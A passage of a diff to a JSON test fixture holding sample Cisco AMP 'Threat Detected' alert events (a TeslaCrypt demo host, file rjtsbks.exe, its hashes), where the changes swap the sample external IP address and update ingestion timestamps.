Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196253\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337059300Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":350000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196253\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -309,7 +309,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -356,7 +356,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -370,8 +370,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174511245Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":334000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337064100Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":334000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -393,7 +393,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -440,7 +440,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -454,8 +454,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174513313Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":318000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337068900Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":318000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -477,7 +477,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -524,7 +524,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -538,8 +538,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174515372Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":318000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196250\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337073Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":318000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196250\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -561,7 +561,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -608,7 +608,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -622,8 +622,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174517419Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":303000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196249\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337077900Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":303000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196249\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -645,7 +645,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -692,7 +692,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -706,8 +706,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174519464Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":287000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196248\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337084500Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":287000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196248\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -729,7 +729,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -776,7 +776,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -790,8 +790,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174521504Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":256000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196247\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337089500Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":256000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196247\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -813,7 +813,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -860,7 +860,7 @@ "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -874,8 +874,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:30.174523569Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6159251512150196246\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", + "ingested": "2021-12-09T13:35:36.337095400Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":225000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat 